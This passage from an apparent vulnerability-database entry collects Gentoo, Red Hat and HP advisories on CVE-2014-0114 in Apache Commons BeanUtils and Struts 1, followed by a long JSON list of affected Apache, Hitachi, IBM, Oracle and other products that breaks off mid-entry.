Resolution
All Commons BeanUtils users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/commons-beanutils-1.9.2"
References
[ 1 ] CVE-2014-0114 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-09
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. Description:
AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. For further information, refer to the release notes linked to in the References section. Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04311273
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04311273 Version: 1
HPSBGN03041 rev.1 - HP IceWall Configuration Manager running Apache Struts, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-05-26 Last Updated: 2014-05-26
Potential Security Impact: Remote execution of arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP IceWall Configuration Manager running Apache Struts.
References: CVE-2014-0114, SSRT101566
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP IceWall Configuration Manager 3.0 running Apache Struts 1
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-0114 (AV:N/AC:L/Au:S/C:P/I:P/A:P) 6.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided mitigation information to protect against potential risk to HP IceWall Configuration Manager running Apache Struts.
Mitigation information for the Apache Struts vulnerability (CVE-2014-0114) is available at the following location:
http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-a pplications/ba-p/6463188#.U2J7xeaSxro
Japanese information is available at the following location:
http://www.hp.com/jp/icewall_patchaccess
Note: The HP IceWall product is only available in Japan.
HISTORY Version:1 (rev.1) - 26 May 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.4"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.7"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.6"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.3.10"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.2"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.1"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.3.5"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.8"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.3.8"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.9"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.8,
"vendor": "hitachi",
"version": "-09-00-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-50-03"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-50-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-10-10"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-00-12"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-08-50-13"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-08-50-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-10-00-03"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-10-00-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-10-00"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "1.0.2"
},
{
"_id": null,
"model": "tiered storage manager software -00 )",
"scope": "eq",
"trust": 1.2,
"vendor": "hitachi",
"version": "7.1.1"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 1.2,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"_id": null,
"model": "commons beanutils",
"scope": "lte",
"trust": 1.0,
"vendor": "apache",
"version": "1.9.1"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "1.0"
},
{
"_id": null,
"model": "device manager software -00 )",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "7.3"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "7.4-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "-08-11-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "-08-00-00"
},
{
"_id": null,
"model": "openclinic ga",
"scope": "eq",
"trust": 0.8,
"vendor": "openclinic ga",
"version": null
},
{
"_id": null,
"model": "openclinic ga",
"scope": "eq",
"trust": 0.8,
"vendor": "openclinic ga",
"version": "version 5.09.02"
},
{
"_id": null,
"model": "openclinic ga",
"scope": "eq",
"trust": 0.8,
"vendor": "openclinic ga",
"version": "version 5.89.05b"
},
{
"_id": null,
"model": "terasoluna server framework for java",
"scope": "eq",
"trust": 0.8,
"vendor": "ntt data",
"version": "2.0.0.1 to 2.0.5.1"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-03"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-11-08"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"_id": null,
"model": "jp1/performance management manager web option",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-07-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-00-12"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-03"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-01"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-02"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-04"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-01"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.4.0-02"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.4.0-01"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.0-06"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-02"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-02"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.0-00"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "8.0.0-03"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "8.0.0-04"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-02"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-04"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "jp1/performance management manager web option",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-07-54"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.1"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.7"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-01"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-10-08"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-01"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-10-00"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.17"
},
{
"_id": null,
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "device manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.3.0"
},
{
"_id": null,
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.6-00"
},
{
"_id": null,
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "tivoli storage manager administration center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"_id": null,
"model": "tivoli workload scheduler z/os connector",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "records manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "retail clearance optimization engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.401"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"_id": null,
"model": "social media analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00"
},
{
"_id": null,
"model": "terasoluna server framework for java",
"scope": "ne",
"trust": 0.3,
"vendor": "ntt data",
"version": "2.0.5.2"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "big-ip webaccelerator hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"_id": null,
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "5.1"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.1"
},
{
"_id": null,
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"_id": null,
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.2"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "device manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-06(x64))"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "3.5.0"
},
{
"_id": null,
"model": "device manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "fuse esb enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.1.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.43"
},
{
"_id": null,
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.0"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.6.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.2"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.13"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0.1"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"_id": null,
"model": "content analytics with enterprise search",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0"
},
{
"_id": null,
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "1.1.0-00"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.47"
},
{
"_id": null,
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.5"
},
{
"_id": null,
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6.0.0"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux enterprise software development kit sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.1.0"
},
{
"_id": null,
"model": "big-ip edge gateway hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.1"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "secure analytics 2013.2r8",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "job management partner 1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-0"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.41"
},
{
"_id": null,
"model": "content manager records enabler",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-06"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.1.19"
},
{
"_id": null,
"model": "openpages grc platform",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.1"
},
{
"_id": null,
"model": "content navigator",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.1"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"_id": null,
"model": "primavera contract management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "tuning manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"_id": null,
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.x"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-04(x64))"
},
{
"_id": null,
"model": "business server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "1"
},
{
"_id": null,
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2.1"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.43"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.10"
},
{
"_id": null,
"model": "jboss operations network",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3.2.1"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.3"
},
{
"_id": null,
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "1.0.0-00"
},
{
"_id": null,
"model": "content navigator",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "xp7 global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.4.0-00"
},
{
"_id": null,
"model": "raplication manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "websphere partner gateway advanced edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "weblogic portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1.0"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.42"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.5-00"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.5.0-02"
},
{
"_id": null,
"model": "big-ip webaccelerator hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.20"
},
{
"_id": null,
"model": "primavera contract management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0.0-00"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-10-07"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.27"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0.0-00"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "knowledge",
